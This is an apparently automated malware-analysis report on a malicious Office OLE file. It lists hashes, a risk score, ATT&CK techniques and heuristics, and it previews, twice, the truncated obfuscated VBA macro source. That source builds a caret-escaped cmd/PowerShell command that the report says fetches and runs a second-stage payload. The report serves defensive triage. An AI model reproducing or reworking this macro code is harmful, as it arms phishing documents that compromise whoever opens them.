Office (OLE) malware analysis — malicious · 65fbe169c5563d91

MALICIOUS

Office (OLE)

91.0 KB First seen: 2019-03-10

MD5: d99c974703a61ff8291b76a8a160147a SHA-1: c99036834fd31309ea97bfd50828d75be19a01f3 SHA-256: 65fbe169c5563d919129f907e97bffbdf79711fba090182950c7ad6caf53d5e7

62 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The OLE document contains VBA macros that, when executed, construct and run a PowerShell command. This command appears to be designed to download and execute a second-stage payload, indicated by the obfuscated string 'md /v^:O/c s^E^t ^4^I^u^m^=p^ow)x^s^h)^l^l'. The large slack space in the OLE file is also suspicious and may be used to hide malicious content.

Heuristics 3

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 93,184 bytes but its declared streams total only 36,445 bytes — 56,739 bytes (61%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10778 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10778 bytes
SHA-256: `20dd4a0320a1d58c355f7f670be363fedca1070e2545d883bdd388135b413e9b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HMQYWlKi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "lHjrUoaS" Function YLRWtFl() On Error Resume Next IsArray CDate(OBqQBV - vwBoSo) VKnsP = jNUCF - GzIwdK * uILnN + iVkjl IsArray Sqr(NijkS) VarType LCase(22305 * sXaAn / GIakYk / zFPihb) JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + " s^E" + "^t " + " ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l" VarType Log(4) jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A" VKnsP = MZsJI + hSYLb aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^" VarType hKLqwO - zVRCR / 25307 * oMqtj VarType Tan(bpTbNX) VarType Int(AEfpiw) IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^" VKnsP = Oct(82734 / 19718) VKnsP = 57875 - owrmk VarType Sqr(moizDq) VarType CDec(3266) IsArray Hex(7028) iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A" VKnsP = CDec(uLVMB) kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^" VarType Str(59989 * lXYtC + 95065 + pTMscI) IsArray Hex(3) VarType 4111 / QQIpa VKnsP = Str(kvXWT) VarType Second(nSItk) KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A" VarType MiPYu + VLiAr - wfbIR - YqwEKY IsArray uXWTX + nCjDad + 65604 * RqpSZX MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+" VarType TimeValue(253183858) IsArray CBool(558) IsArray Second(jdULI / VLrEwj) fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^" YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF VKnsP = CDate(14519 / qWqzp / JojZdU * 68430) VarType 50642 / 72586 VarType 85356 / PhBjzq End Function Function pzijAUz() On Error Resume Next IsArray Oct(94) rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^" VKnsP = CDbl(9) VarType Sqr(ikmcLT) IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?" IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan) VarType cJssD + 45380 - csnsn + lCAOS IsArray Oct(hdLhCc / DtfdYk) PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A" VKnsP = KUCZY + UdBTmq VarType QONkT + jcmQE LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^" VKnsP = paHITz - huimu / 51839 - DrQih VKnsP = Str(1) IsArray 39495 + BzhLv VarType Hex(2975) VarType Oct(pXfIAp) tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw" VKnsP = Month(VUiYJ) IsArray Month(18492 / dUjKf + aUcUos - IOwUQ) wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^" VarType nWZMSR * wotiGO jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v" VKnsP = CDate(1) GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?" VarType Log(FBwKm) IsArray CDec(XEvGWY) VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz IsArray Log(zXobJ) FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?" IsArray CStr(89) VarType Int(kAYGj) VarType 28348 / MRoZpu / 77 + EmHDj GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^" pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB VKnsP = TypeName(HDalfY) IsArray Fix(3300) VKnsP = CDbl(wUDJ ... (truncated)

SHA-256: 20dd4a0320a1d58c355f7f670be363fedca1070e2545d883bdd388135b413e9b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HMQYWlKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lHjrUoaS"
Function YLRWtFl()
On Error Resume Next
IsArray CDate(OBqQBV - vwBoSo)
   VKnsP = jNUCF - GzIwdK * uILnN + iVkjl
   IsArray Sqr(NijkS)
   VarType LCase(22305 * sXaAn / GIakYk / zFPihb)
JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c   " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + "  s^E" + "^t " + "   ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l"
VarType Log(4)
jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A"
VKnsP = MZsJI + hSYLb
aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^"
VarType hKLqwO - zVRCR / 25307 * oMqtj
   VarType Tan(bpTbNX)
   VarType Int(AEfpiw)
IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^"
VKnsP = Oct(82734 / 19718)
   VKnsP = 57875 - owrmk
   VarType Sqr(moizDq)
   VarType CDec(3266)
   IsArray Hex(7028)
iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A"
VKnsP = CDec(uLVMB)
kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^"
VarType Str(59989 * lXYtC + 95065 + pTMscI)
   IsArray Hex(3)
   VarType 4111 / QQIpa
   VKnsP = Str(kvXWT)
   VarType Second(nSItk)
KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A"
VarType MiPYu + VLiAr - wfbIR - YqwEKY
   IsArray uXWTX + nCjDad + 65604 * RqpSZX
MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+"
VarType TimeValue(253183858)
   IsArray CBool(558)
   IsArray Second(jdULI / VLrEwj)
fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^"
YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF
   VKnsP = CDate(14519 / qWqzp / JojZdU * 68430)
   VarType 50642 / 72586
   VarType 85356 / PhBjzq
End Function
Function pzijAUz()
On Error Resume Next
IsArray Oct(94)
rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^"
VKnsP = CDbl(9)
   VarType Sqr(ikmcLT)
IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?"
IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan)
   VarType cJssD + 45380 - csnsn + lCAOS
   IsArray Oct(hdLhCc / DtfdYk)
PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A"
VKnsP = KUCZY + UdBTmq
   VarType QONkT + jcmQE
LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^"
VKnsP = paHITz - huimu / 51839 - DrQih
   VKnsP = Str(1)
   IsArray 39495 + BzhLv
   VarType Hex(2975)
   VarType Oct(pXfIAp)
tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw"
VKnsP = Month(VUiYJ)
   IsArray Month(18492 / dUjKf + aUcUos - IOwUQ)
wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^"
VarType nWZMSR * wotiGO
jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v"
VKnsP = CDate(1)
GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?"
VarType Log(FBwKm)
   IsArray CDec(XEvGWY)
   VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz
   IsArray Log(zXobJ)
FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?"
IsArray CStr(89)
   VarType Int(kAYGj)
   VarType 28348 / MRoZpu / 77 + EmHDj
GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^"
pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB
   VKnsP = TypeName(HDalfY)
   IsArray Fix(3300)
   VKnsP = CDbl(wUDJ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.